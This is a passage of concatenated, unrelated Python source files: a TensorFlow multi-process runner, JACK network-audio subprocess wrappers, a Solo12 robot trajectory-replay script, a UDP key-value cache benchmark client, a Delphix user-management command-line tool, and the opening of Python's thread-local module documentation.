  when given) into the JSON form TensorFlow reads from `TF_CONFIG`.
  """
  config = {
      'cluster': cluster_spec,
      'task': {'type': task_type, 'index': task_id},
  }
  if rpc_layer is not None:
    config['rpc_layer'] = rpc_layer
  os.environ['TF_CONFIG'] = json.dumps(config)
def run(proc_func,
        cluster_spec,
        rpc_layer=None,
        max_run_time=None,
        grpc_fail_fast=None,
        stream_stdout=True,
        list_stdout=False,
        timeout=_DEFAULT_TIMEOUT_SEC,
        args=None,
        kwargs=None):  # pylint: disable=g-doc-args
  """Runs `proc_func` in local child processes and waits for completion.

  Convenience wrapper that builds a `MultiProcessRunner`, starts it, and
  joins it. See `MultiProcessRunner.start` and `MultiProcessRunner.join`
  for detailed documentation of the parameters.

  Returns:
    The `MultiProcessRunnerResult` object from `MultiProcessRunner.join()`.
  """
  mpr = MultiProcessRunner(
      proc_func,
      cluster_spec,
      rpc_layer,
      max_run_time=max_run_time,
      grpc_fail_fast=grpc_fail_fast,
      stream_stdout=stream_stdout,
      list_stdout=list_stdout,
      args=args,
      kwargs=kwargs)
  mpr.start()
  return mpr.join(timeout)
# This is set by MultiProcessRunner in worker processes.
_barrier = None


def barrier():
  """Returns the cross-process barrier set up by `MultiProcessRunner`.

  Raises:
    ValueError: if called in the main process, where the barrier has not
      been installed.
  """
  if _barrier is None:
    # Bug fix: the implicit string concatenation previously produced
    # "barrier()in the main process" (missing space between the literals).
    raise ValueError(
        'barrier is not defined. It is likely because you are calling '
        'barrier() in the main process. barrier() can only be called in '
        'the subprocesses.'
    )
  return _barrier
def test_main():
  """Main function to be called within `__main__` of a test file.

  Delegates to `multi_process_lib.test_main()`; see that module for what
  setup it performs before running the tests.
  """
  multi_process_lib.test_main()
|
network.py | import threading
import subprocess
import socket
import time
from . import base
class NetworkInput(base.Object):
    """Wraps a `zita-n2j` subprocess that receives audio over the network.

    Exposes two JACK output ports named `<name>:out_1` and `<name>:out_2`.
    """

    def __init__(self, name, port, buf=100, bind="0.0.0.0"):
        self.name = name    # JACK client name passed to zita-n2j
        self.port = port    # UDP port to listen on
        self.buf = buf      # zita-n2j buffer size
        self.bind = bind    # address to bind to
        self.out_ports = []
        self.out_ports.append("%s:out_%d" % (self.name, 1))
        self.out_ports.append("%s:out_%d" % (self.name, 2))
        base.Object.__init__(self)

    def run(self):
        """Starts a thread that runs (and restarts) the zita-n2j process."""
        def target():
            # Bug fix: `traceback` was referenced below without ever being
            # imported, so the error path itself raised NameError.
            import traceback
            while self.running:
                try:
                    self.process = subprocess.Popen(
                        ["zita-n2j", "--jname", self.name, "--buf",
                         str(self.buf), self.bind, str(self.port)],
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                    self.output, self.error = self.process.communicate()
                    self.status = self.process.returncode
                except Exception:
                    # Bug fix: was a bare `except:`, which also swallowed
                    # SystemExit/KeyboardInterrupt.
                    self.error = traceback.format_exc()
                    self.status = -1
                # Back off up to ~5s before restarting, but exit promptly
                # when self.running is cleared.
                for i in range(10):
                    if not self.running:
                        break
                    time.sleep(0.5)
        self.thread = threading.Thread(target=target)
        self.thread.start()
class NetworkOutput(base.Object):
    """Wraps a `zita-j2n` subprocess that streams audio to a remote host.

    Exposes `nchannels` JACK input ports named `<name>:in_1` ... `in_N`.
    """

    def __init__(self, name, dst, port, nchannels=2, sampletype="float", mtu=1000):
        self.name = name              # JACK client name passed to zita-j2n
        self.dst = dst                # destination host/IP
        self.port = port              # destination UDP port
        self.nchannels = nchannels    # number of channels to send
        self.sampletype = sampletype  # zita-j2n sample format flag
        self.mtu = mtu                # network MTU passed to zita-j2n
        self.in_ports = []
        for i in range(self.nchannels):
            self.in_ports.append("%s:in_%d" % (self.name, i+1))
        base.Object.__init__(self)

    def run(self):
        """Starts a thread that runs (and restarts) the zita-j2n process."""
        def target():
            # Bug fix: `traceback` was referenced below without ever being
            # imported, so the error path itself raised NameError.
            import traceback
            while self.running:
                try:
                    self.process = subprocess.Popen(
                        ["zita-j2n", "--mtu", str(self.mtu), "--jname",
                         self.name, "--%s" % self.sampletype, "--chan",
                         str(self.nchannels), self.dst, str(self.port)],
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                    self.output, self.error = self.process.communicate()
                    self.status = self.process.returncode
                except Exception:
                    # Bug fix: was a bare `except:`, which also swallowed
                    # SystemExit/KeyboardInterrupt.
                    self.error = traceback.format_exc()
                    print(self.error)
                    self.status = -1
                # Back off up to ~5s before restarting, but exit promptly
                # when self.running is cleared.
                for i in range(10):
                    if not self.running:
                        break
                    time.sleep(0.5)
        self.thread = threading.Thread(target=target)
        self.thread.start()
|
main_solo12_replay.py | # coding: utf8
import os
import sys
sys.path.insert(0, './mpctsid')
from utils.logger import Logger
import argparse
import numpy as np
from utils.viewerClient import viewerClient, NonBlockingViewerFromRobot
import threading
# Run in PyBullet simulation instead of driving the real robot when True.
SIMULATION = False
# Record data with the Logger (saved at the end of the run) when True.
LOGGING = True
if SIMULATION:
    from mpctsid.utils_mpc import PyBulletSimulator
else:
    # from pynput import keyboard
    from solo12 import Solo12
    from utils.qualisysClient import QualisysClient
# Control loop period in seconds (1 kHz).
DT = 0.001
# Set to True once the user has pressed Enter (see get_input / on_press).
key_pressed = False
def on_press(key):
    """Wait for a specific key press on the keyboard

    Keyboard-listener callback: sets the global `key_pressed` flag when
    Enter is pressed and returns False to stop the listener.

    NOTE(review): `keyboard` is not in scope — the `pynput` import above
    is commented out — so calling this would raise NameError (which the
    AttributeError handler below would NOT catch). This callback appears
    unused in this script; `get_input()` is used instead.

    Args:
        key (keyboard.Key): the key we want to wait for
    """
    global key_pressed
    try:
        if key == keyboard.Key.enter:
            key_pressed = True
            # Stop listener
            return False
    except AttributeError:
        print('Unknown key {0} pressed'.format(key))
def get_input():
    """Blocks on stdin until the user presses Enter, then raises the flag.

    Runs in a background thread (see put_on_the_floor); the main control
    loop polls `key_pressed` while this waits.
    """
    global key_pressed
    input('Put the robot on the floor and press Enter \n')
    # Only reached once Enter has been pressed.
    key_pressed = True
def put_on_the_floor(device, q_init):
    """Make the robot go to the default initial position and wait for the user
    to press the Enter key to start the main control loop

    Holds each motor at its target with a current-saturated PD law while a
    background thread waits for Enter on stdin (get_input sets key_pressed).

    Args:
        device (robot wrapper): a wrapper to communicate with the robot
        q_init (array): the default position of the robot
    """
    global key_pressed
    key_pressed = False
    Kp_pos = 3.    # proportional gain on position error
    Kd_pos = 0.01  # derivative gain on measured velocity
    imax = 3.0     # current saturation limit
    pos = np.zeros(device.nb_motors)
    for motor in range(device.nb_motors):
        # Map URDF joint ordering to motor ordering and apply gear-ratio sign.
        pos[motor] = q_init[device.motorToUrdf[motor]] * device.gearRatioSigned[motor]
    # Wait for Enter without blocking the control loop below.
    i=threading.Thread(target=get_input)
    i.start()
    while not key_pressed:
        device.UpdateMeasurment()
        for motor in range(device.nb_motors):
            ref = Kp_pos*(pos[motor] - device.hardware.GetMotor(motor).GetPosition() -
                          Kd_pos*device.hardware.GetMotor(motor).GetVelocity())
            ref = min(imax, max(-imax, ref))  # clamp the commanded current
            device.hardware.GetMotor(motor).SetCurrentReference(ref)
        device.SendCommand(WaitEndOfCycle=True)
    print("Start the motion.")
def mcapi_playback(name_interface):
    """Main function that calibrates the robot, get it into a default waiting position then launch
    the main control loop once the user has pressed the Enter key

    Replays a pre-recorded TSID trajectory (joint positions, velocities and
    feed-forward torques loaded from .npy files) on the robot (or in
    simulation), then damps the joints to lower the robot, and finally
    saves the logs.

    Args:
        name_interface (string): name of the interface that is used to communicate with the robot
    """
    # Hard-coded location of the recorded trajectory to replay.
    name_replay = "/home/odri/git/thomasCbrs/log_eval/test_3/06_nl/"
    # name_replay = "/home/odri/git/thomasCbrs/log_eval/vmax_nl/"
    # replay_q = np.loadtxt(name_replay + "_q.dat", delimiter=" ")
    # replay_v = np.loadtxt(name_replay + "_v.dat", delimiter=" ")
    # replay_tau = np.loadtxt(name_replay + "_tau.dat", delimiter=" ")
    qtsid_full = np.load(name_replay + "qtsid.npy" , allow_pickle = True)
    vtsid_full = np.load(name_replay + "vtsid.npy" , allow_pickle = True)
    tau_ff = np.load(name_replay + "torques_ff.npy" , allow_pickle = True)
    # Drop the floating-base part (7 position / 6 velocity components) and
    # transpose so rows are time steps and columns the 12 actuated joints.
    replay_q = qtsid_full[7:,:].transpose()
    replay_v = vtsid_full[6:,:].transpose()
    replay_tau = tau_ff.transpose()
    N_SIMULATION = replay_q.shape[0]
    # Default position after calibration
    # q_init = replay_q[0, 1:]
    q_init = replay_q[0, :]
    if SIMULATION:
        device = PyBulletSimulator()
        qc = None
    else:
        device = Solo12(name_interface, dt=DT)
        qc = QualisysClient(ip="140.93.16.160", body_id=0)  # motion capture client
    if LOGGING:
        logger = Logger(device, qualisys=qc, logSize=N_SIMULATION)
    # Number of motors
    nb_motors = device.nb_motors
    # Initiate communication with the device and calibrate encoders
    if SIMULATION:
        device.Init(calibrateEncoders=True, q_init=q_init, envID=0,
                    use_flat_plane=True, enable_pyb_GUI=True, dt=DT)
    else:
        device.Init(calibrateEncoders=True, q_init=q_init)
    # Wait for Enter input before starting the control loop
    put_on_the_floor(device, q_init)
    # CONTROL LOOP ***************************************************
    t = 0.0
    t_max = (N_SIMULATION-1) * DT
    i = 0
    # Joint PD gains for the replay (12 actuated joints).
    P = 7 * np.ones(12)
    D = 0.5 * np.ones(12)
    q_des = np.zeros(12)
    v_des = np.zeros(12)
    # NOTE: this rebinds the name `tau_ff` used above for the loaded file;
    # harmless since replay_tau was already computed from it.
    tau_ff = np.zeros(12)
    while ((not device.hardware.IsTimeout()) and (t < t_max)):
        device.UpdateMeasurment()  # Retrieve data from IMU and Motion capture
        # Set desired quantities for the actuators
        device.SetDesiredJointPDgains(P, D)
        # device.SetDesiredJointPosition(replay_q[i, 1:])
        # device.SetDesiredJointVelocity(replay_v[i, 1:])
        # device.SetDesiredJointTorque(replay_tau[i, 1:])
        device.SetDesiredJointPosition(replay_q[i, :])
        device.SetDesiredJointVelocity(replay_v[i, :])
        device.SetDesiredJointTorque(replay_tau[i, :])
        # Call logger
        if LOGGING:
            logger.sample(device, qualisys=qc)
        # Send command to the robot
        device.SendCommand(WaitEndOfCycle=True)
        if ((device.cpt % 1000) == 0):
            device.Print()
        t += DT
        i += 1
    # DAMPING TO GET ON THE GROUND PROGRESSIVELY *********************
    t = 0.0
    t_max = 2.5
    while ((not device.hardware.IsTimeout()) and (t < t_max)):
        device.UpdateMeasurment()  # Retrieve data from IMU and Motion capture
        # Set desired quantities for the actuators
        # Zero stiffness, pure damping: lets the robot settle down gently.
        device.SetDesiredJointPDgains(np.zeros(12), 0.1 * np.ones(12))
        device.SetDesiredJointPosition(np.zeros(12))
        device.SetDesiredJointVelocity(np.zeros(12))
        device.SetDesiredJointTorque(np.zeros(12))
        # Send command to the robot
        device.SendCommand(WaitEndOfCycle=True)
        if ((device.cpt % 1000) == 0):
            device.Print()
        t += DT
    # FINAL SHUTDOWN *************************************************
    # Whatever happened we send 0 torques to the motors.
    device.SetDesiredJointTorque([0]*nb_motors)
    device.SendCommand(WaitEndOfCycle=True)
    if device.hardware.IsTimeout():
        print("Masterboard timeout detected.")
        print("Either the masterboard has been shut down or there has been a connection issue with the cable/wifi.")
    device.hardware.Stop()  # Shut down the interface between the computer and the master board
    # Save the logs of the Logger object
    if LOGGING:
        logger.saveAll()
        print("Log saved")
    if SIMULATION:
        # Disconnect the PyBullet server (also close the GUI)
        device.Stop()
    print("End of script")
    quit()
def main():
    """Entry point: parse the network-interface argument and start playback."""
    arg_parser = argparse.ArgumentParser(description='Playback trajectory to show the extent of solo12 workspace.')
    arg_parser.add_argument('-i',
                            '--interface',
                            required=True,
                            help='Name of the interface (use ifconfig in a terminal), for instance "enp1s0"')
    parsed = arg_parser.parse_args()
    mcapi_playback(parsed.interface)


if __name__ == "__main__":
    main()
|
client.py | import socket
import struct
import time
import thread
import sys
from collections import deque
import random
import math
import threading
sys.path.append('../include')
from constants import *
from headers import *
from db import kv
# Workload parameters.
path_query = "query.txt"  # query-file path (not read in this script)
num_query = 1000000       # resolution of the precomputed zipf table
zipf = 0.99               # zipf skew parameter
len_key = 16              # key size in bytes (4-byte header + zero padding)
len_val = 128             # value size in bytes
max_key = 1000            # key space size
#Zipf
# Precompute generalized harmonic sums zeta[k] = sum_{i<=k} 1/i^zipf, then
# invert the CDF into `field`: for a uniform random r in [1, num_query],
# field[r] is a zipf-distributed key in [1, max_key].
zeta = [0.0]
for i in range(1, max_key + 1):
    zeta.append(zeta[i - 1] + 1 / pow(i, zipf))
field = [0] * (num_query + 1)
k = 1
for i in range(1, num_query + 1):
    if (i > num_query * zeta[k] / zeta[max_key]):
        k = k + 1
    field[i] = k
import argparse
# Command line: base IP octet for client addresses, thread count, and an
# optional sharding mode (mutually informal; --nosharding wins below).
parser = argparse.ArgumentParser()
parser.add_argument("base", help="base ip", type=int)
parser.add_argument("num", help="number of threads", type=int)
parser.add_argument('--nosharding', action='store_true', default=False, help='no sharding')
parser.add_argument('--badsharding', action='store_true', default=False, help='bad sharding')
args = parser.parse_args()
# The two storage servers that keys are sharded across.
SERVER_A = "10.0.0.1"
SERVER_B = "10.0.0.2"
no_sharding = args.nosharding
bad_sharding = args.badsharding
def get_shard(key):
    """Pick the server responsible for `key` under the selected sharding mode.

    NOTE: this file is Python 2, so `key / 100` is integer division.
    """
    if no_sharding:
        # Everything goes to a single server.
        return SERVER_A
    if bad_sharding:
        # Coarse sharding: alternate servers per block of 100 keys.
        return SERVER_A if (key / 100) % 2 == 0 else SERVER_B
    # Fine-grained sharding: alternate servers per key.
    return SERVER_A if key % 2 == 0 else SERVER_B
# Global response counter, read/reset by the QPS loop at the bottom of the
# file. (Incremented from many threads without a lock — a benign race for a
# rough throughput metric.)
responses = 0
def worker(ip=None):
    """Client thread: issue zipf-distributed read requests over UDP forever.

    Binds its own source IP, sends NC_READ_REQUEST packets to the shard
    owning each key, and validates each reply against the local `kv` copy.
    Exits the loop (and thus the thread) on any protocol/data mismatch.
    This file is Python 2 (print statements, str() on packets).
    """
    global responses
    use_zipf = True
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind((ip, NC_PORT))
    while (True):
        if use_zipf:
            # Draw a key through the precomputed inverse-CDF table.
            r = random.randint(1, num_query)
            key_header = field[r]
        else:
            key_header = random.randint(1, max_key)
        # 4-byte big-endian key header, zero-padded to len_key bytes.
        key_field = struct.pack(">I", key_header)
        for x in range(len_key - 4):
            key_field += "\0"
        rq_p = P4NetCache(type=NC_READ_REQUEST, key=key_field)
        s.sendto(str(rq_p), (get_shard(key_header), NC_PORT))
        packet_str, src = s.recvfrom(1024)
        nc_p = P4NetCache(packet_str)
        if nc_p.type != NC_READ_REPLY:
            print "unexpected response"
            break
        key_header = struct.unpack(">I", nc_p.key[:4])[0]
        if key_header < 1 or key_header > 1000:
            print "invalid key %d" % key_header
            break
        if nc_p.value != kv[key_header]:
            print "data mismatch on key %d" % key_header
            print "expected:"
            print kv[key_header]
            break
        responses += 1
    # Only reached after a break above; dump the offending packet.
    nc_p.show()
from threading import Thread
# Spawn one worker thread per client IP (base..base+num-1); daemon threads
# die with the main process.
for x in range(args.num):
    ip = "10.0.0.%d" % (x + args.base)
    print ip
    t = Thread(target=worker, kwargs={"ip": ip})
    t.setDaemon(True)
    t.start()
# Main thread: print aggregate queries-per-second once a second.
last_print = time.time()
while (True):
    time.sleep(1)
    duration = time.time() - last_print
    print "QPS = %f" % (responses / duration)
    responses = 0
    last_print = time.time()
|
dx_users.py | #!/usr/bin/env python
# Adam Bowen - Aug 2017
# Description:
# This script will allow you to easily manage users in Delphix
# This script currently only supports Native authentication
#
# Requirements
# pip install docopt delphixpy.v1_8_0
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script.
"""Description
Usage:
dx_users.py (--user_name <name> [(--add --password <password> --email <email_address> [--jsonly]) |--delete])
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_users.py --update --user_name <name> [ --password <password> ] [--email <email_address> ] [ --delete ] [--jsonly]
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_users.py (--list)
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_users.py -h | --help | -v | --version
Description
Examples:
dx_users.py --add --user_name dev --password delphix --email "test@something.com" --jsonly
dx_users.py --debug --config delphixpy.v1_8_0-examples/dxtools_1.conf --update --user_name dev --password not_delphix --email "test@somethingelse.com"
dx_users.py --delete --user_name dev
dx_users.py --list
Options:
--user_name <name> The name of the user
--password <password> The password of the user to be created/updated
--email <email_address> The email addres of the user to be created/updated
--jsonly Designate the user as a Jet Stream Only User
--add Add the identified user
--update Update the identified user
--delete Delete the identified user
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_skel.log]
-h --help Show this screen.
-v --version Show version.
"""
from __future__ import print_function
import sys
from os.path import basename
from time import sleep
from time import time
from docopt import docopt
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import authorization
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import role
from delphixpy.v1_8_0.web import user
from delphixpy.v1_8_0.web.vo import Authorization
from delphixpy.v1_8_0.web.vo import CredentialUpdateParameters
from delphixpy.v1_8_0.web.vo import PasswordCredential
from delphixpy.v1_8_0.web.vo import User
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_exception
from lib.DxLogging import print_info
from lib.GetReferences import find_all_objects
from lib.GetReferences import find_obj_by_name
from lib.GetSession import GetSession
VERSION = "v.0.0.004"
def add_user(user_name, user_password, user_email, jsonly=None):
    """Create a native-auth Delphix user, then apply the JS-only role.

    Exits the script with status 1 if the engine rejects the creation.
    """
    new_user = User()
    new_user.name = user_name
    new_user.email_address = user_email
    new_user.credential = PasswordCredential()
    new_user.credential.password = user_password
    try:
        user.create(dx_session_obj.server_session, new_user)
        print("Attempting to create {}".format(user_name))
    except (DlpxException, RequestError) as e:
        print_exception(
            "\nERROR: Creating the user {} "
            "encountered an error:\n{}".format(user_name, e)
        )
        sys.exit(1)
    # Grant (or skip) the Jet Stream Only role according to the flag.
    js_only(user_name, jsonly)
def js_only(user_name, jsonly=None):
    """
    Switch the user to/from a jsonly user

    When `jsonly` is truthy, grants the "Jet Stream User" role to the user;
    otherwise deletes the matching authorization object (looked up by the
    engine's "(target, role, user)" naming scheme).
    """
    user_obj = find_obj_by_name(dx_session_obj.server_session, user, user_name)
    role_obj = find_obj_by_name(dx_session_obj.server_session, role, "Jet Stream User")
    if jsonly:
        authorization_obj = Authorization()
        authorization_obj.role = role_obj.reference
        authorization_obj.target = user_obj.reference
        authorization_obj.user = user_obj.reference
        authorization.create(dx_session_obj.server_session, authorization_obj)
    else:
        # Authorization objects are named "(targetRef, roleRef, userRef)";
        # rebuild that name to locate the one to delete.
        auth_name = (
            "("
            + user_obj.reference
            + ", "
            + role_obj.reference
            + ", "
            + user_obj.reference
            + ")"
        )
        authorization.delete(
            dx_session_obj.server_session,
            find_obj_by_name(
                dx_session_obj.server_session, authorization, auth_name
            ).reference,
        )
def update_user(user_name, user_password=None, user_email=None, jsonly=None):
    """
    This function updates the user

    Updates email and/or password independently (each is skipped when None),
    exiting with status 1 on engine errors, then re-applies the JS-only
    role state.
    """
    if user_email:
        updated_user_obj = User()
        updated_user_obj.email_address = user_email
        try:
            user.update(
                dx_session_obj.server_session,
                find_obj_by_name(
                    dx_session_obj.server_session, user, user_name
                ).reference,
                updated_user_obj,
            )
            print("Attempting to update {}".format(user_name))
        except (DlpxException, RequestError) as e:
            print_exception(
                "\nERROR: Updating the user {} "
                "encountered an error:\n{}".format(user_name, e)
            )
            sys.exit(1)
    if user_password:
        # Passwords go through a dedicated credential-update endpoint.
        new_password_obj = CredentialUpdateParameters()
        new_password_obj.new_credential = PasswordCredential()
        new_password_obj.new_credential.password = user_password
        try:
            user.update_credential(
                dx_session_obj.server_session,
                find_obj_by_name(
                    dx_session_obj.server_session, user, user_name
                ).reference,
                new_password_obj,
            )
            print("Attempting to update {} password".format(user_name))
        except (DlpxException, RequestError) as e:
            print_exception(
                "\nERROR: Updating the user {} password "
                "encountered an error:\n{}".format(user_name, e)
            )
            sys.exit(1)
    js_only(user_name, jsonly)
def delete_user(user_name):
    """
    This function deletes the user

    (Docstring fixed: it previously said "adds".) Looks the user up by name
    and deletes it, exiting with status 1 on engine errors.
    """
    user_obj = find_obj_by_name(dx_session_obj.server_session, user, user_name)
    try:
        user.delete(dx_session_obj.server_session, user_obj.reference)
        print("Attempting to delete {}".format(user_name))
    except (DlpxException, RequestError) as e:
        print_exception(
            "\nERROR: Deleting the user {} "
            "encountered an error:\n{}".format(user_name, e)
        )
        sys.exit(1)
def list_users():
    """Print the name of every user defined on the engine."""
    for current_user in find_all_objects(dx_session_obj.server_session, user):
        print("User: {}".format(current_user.name))
def run_async(func):
    """
    http://code.activestate.com/recipes/576684-simple-threading-decorator/
    run_async(func)

    Decorator that makes the wrapped callable execute in its own thread.
    Calling the decorated function starts a threading.Thread running `func`
    with the supplied arguments and returns that Thread object, so callers
    can `.join()` it later.

    E.g.:
        t1 = task1()
        t2 = task2()
        ...
        t1.join()
        t2.join()
    """
    from threading import Thread
    from functools import wraps

    @wraps(func)
    def async_func(*args, **kwargs):
        background = Thread(target=func, args=args, kwargs=kwargs)
        background.start()
        return background

    return async_func
@run_async
def main_workflow(engine):
    """
    This function actually runs the jobs.
    Use the @run_async decorator to run this function asynchronously.
    This allows us to run against multiple Delphix Engine simultaneously

    engine: Dictionary of engines
    """
    try:
        # Setup the connection to the Delphix Engine
        dx_session_obj.serversess(
            engine["ip_address"], engine["username"], engine["password"]
        )
    except DlpxException as e:
        # NOTE(review): "--target" is not an option defined in this script's
        # docopt usage, so this error path would itself raise KeyError —
        # confirm against the intended template this was copied from.
        print_exception(
            "\nERROR: Engine {} encountered an error while"
            "{}:\n{}\n".format(engine["hostname"], arguments["--target"], e)
        )
        sys.exit(1)
    # Single-item work queue: perform the requested operation once, then
    # keep looping only to poll any jobs it started.
    thingstodo = ["thingtodo"]
    try:
        with dx_session_obj.job_mode(single_thread):
            while len(dx_session_obj.jobs) > 0 or len(thingstodo) > 0:
                if len(thingstodo) > 0:
                    if arguments["--add"]:
                        add_user(
                            arguments["--user_name"],
                            arguments["--password"],
                            arguments["--email"],
                            arguments["--jsonly"],
                        )
                    elif arguments["--update"]:
                        update_user(
                            arguments["--user_name"],
                            arguments["--password"],
                            arguments["--email"],
                            arguments["--jsonly"],
                        )
                    elif arguments["--delete"]:
                        delete_user(arguments["--user_name"])
                    elif arguments["--list"]:
                        list_users()
                    thingstodo.pop()
                # get all the jobs, then inspect them
                i = 0
                for j in dx_session_obj.jobs.keys():
                    job_obj = job.get(
                        dx_session_obj.server_session, dx_session_obj.jobs[j]
                    )
                    print_debug(job_obj)
                    print_info(
                        "{}: User: {}".format(engine["hostname"], job_obj.job_state)
                    )
                    if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
                        # If the job is in a non-running state, remove it
                        # from the
                        # running jobs list.
                        del dx_session_obj.jobs[j]
                    elif job_obj.job_state in "RUNNING":
                        # If the job is in a running state, increment the
                        # running job count.
                        i += 1
                print_info("{}: {:d} jobs running.".format(engine["hostname"], i))
                # If we have running jobs, pause before repeating the
                # checks.
                if len(dx_session_obj.jobs) > 0:
                    sleep(float(arguments["--poll"]))
    except (HttpError, RequestError, JobError, DlpxException) as e:
        print_exception("ERROR: Could not complete user " "operation: {}".format(e))
def run_job():
    """
    This function runs the main_workflow asynchronously against all the
    servers specified

    Chooses the target engine(s) from --all / --engine / the dxtools.conf
    default, launches main_workflow (a @run_async function returning a
    Thread) for each, and joins all threads before returning.

    Raises:
        DlpxException: if the named engine is not in dxtools.conf, or no
            default engine is configured.
    """
    # Create an empty list to store threads we create.
    threads = []
    engine = None
    # If the --all argument was given, run against every engine in dxtools.conf
    if arguments["--all"]:
        print_info("Executing against all Delphix Engines in the dxtools.conf")
        try:
            # For each server in the dxtools.conf...
            for delphix_engine in dx_session_obj.dlpx_engines:
                engine = dx_session_obj[delphix_engine]
                # Create a new thread and add it to the list.
                threads.append(main_workflow(engine))
        except DlpxException as e:
            print("Error encountered in run_job():\n{}".format(e))
            sys.exit(1)
    elif arguments["--all"] is False:
        # Else if the --engine argument was given, test to see if the engine
        # exists in dxtools.conf
        if arguments["--engine"]:
            try:
                engine = dx_session_obj.dlpx_engines[arguments["--engine"]]
                print_info(
                    "Executing against Delphix Engine: {}\n".format(
                        (arguments["--engine"])
                    )
                )
            except (DlpxException, RequestError, KeyError) as e:
                raise DlpxException(
                    "\nERROR: Delphix Engine {} cannot be "
                    "found in {}. Please check your value "
                    "and try again. Exiting.\n".format(
                        arguments["--engine"], config_file_path
                    )
                )
        else:
            # Else search for a default engine in the dxtools.conf
            for delphix_engine in dx_session_obj.dlpx_engines:
                if dx_session_obj.dlpx_engines[delphix_engine]["default"] == "true":
                    engine = dx_session_obj.dlpx_engines[delphix_engine]
                    print_info(
                        "Executing against the default Delphix Engine "
                        "in the dxtools.conf: {}".format(
                            dx_session_obj.dlpx_engines[delphix_engine]["hostname"]
                        )
                    )
                    break
            # Idiom fix: compare to None with `is`, not `==`.
            if engine is None:
                raise DlpxException("\nERROR: No default engine found. Exiting")
        # run the job against the engine
        threads.append(main_workflow(engine))
    # For each thread in the list...
    for each in threads:
        # join them back together so that we wait for all threads to complete
        # before moving on
        each.join()
def time_elapsed():
    """
    This function calculates the time elapsed since the beginning of the script.
    Call this anywhere you want to note the progress in terms of time

    Returns the elapsed minutes since the module-global `time_start`,
    rounded to one decimal place.
    """
    elapsed_seconds = time() - time_start
    return round(elapsed_seconds / 60, 1)
def main(arguments):
    """Script driver: set up globals, run the job(s), and map failures to
    exit codes.

    Args:
        arguments: dict produced by docopt from the module docstring.
    """
    # We want to be able to call on these variables anywhere in the script.
    global single_thread
    global usebackup
    global time_start
    global config_file_path
    global dx_session_obj
    global debug
    if arguments["--debug"]:
        debug = True
    try:
        dx_session_obj = GetSession()
        logging_est(arguments["--logdir"])
        print_debug(arguments)
        time_start = time()
        single_thread = False
        config_file_path = arguments["--config"]
        # Parse the dxtools.conf and put it into a dictionary
        dx_session_obj.get_config(config_file_path)
        # This is the function that will handle processing main_workflow for
        # all the servers.
        run_job()
        elapsed_minutes = time_elapsed()
        print_info(
            "script took {:.2f} minutes to get this far.".format(elapsed_minutes)
        )
    # Here we handle what we do when the unexpected happens
    except DlpxException as e:
        print_exception(
            "script encountered an error while processing the"
            "config file:\n{}".format(e)
        )
    except SystemExit as e:
        """
        This is what we use to handle our sys.exit(#)
        """
        sys.exit(e)
    except HttpError as e:
        """
        We use this exception handler when our connection to Delphix fails
        """
        print_exception(
            "Connection failed to the Delphix Engine"
            "Please check the ERROR message:\n{}".format(e)
        )
        sys.exit(1)
    except JobError as e:
        """
        We use this exception handler when a job fails in Delphix so that
        we have actionable data
        """
        elapsed_minutes = time_elapsed()
        print_exception("A job failed in the Delphix Engine")
        print_info(
            "{} took {:.2f} minutes to get this far\n{}".format(
                basename(__file__), elapsed_minutes, e
            )
        )
        sys.exit(3)
    except KeyboardInterrupt:
        """
        We use this exception handler to gracefully handle ctrl+c exits
        """
        print_debug("You sent a CTRL+C to interrupt the process")
        elapsed_minutes = time_elapsed()
        print_info(
            "{} took {:.2f} minutes to get this far\n".format(
                basename(__file__), elapsed_minutes
            )
        )
    except:
        """
        Everything else gets caught here
        """
        # Catch-all boundary: log the exception type and exit non-zero.
        print_exception(sys.exc_info()[0])
        elapsed_minutes = time_elapsed()
        print_info(
            "{} took {:.2f} minutes to get this far\n".format(
                basename(__file__), elapsed_minutes
            )
        )
        sys.exit(1)
if __name__ == "__main__":
    # Grab our arguments from the doc at the top of the script
    # (docopt parses the module docstring as the CLI specification).
    arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
    # Feed our arguments to the main function, and off we go!
    main(arguments)
|
_threading_local.py | """Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = sorted(mydata.__dict__.items())
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... def __init__(self, /, **kw):
... self.__dict__.update(kw)
... def squared(self):
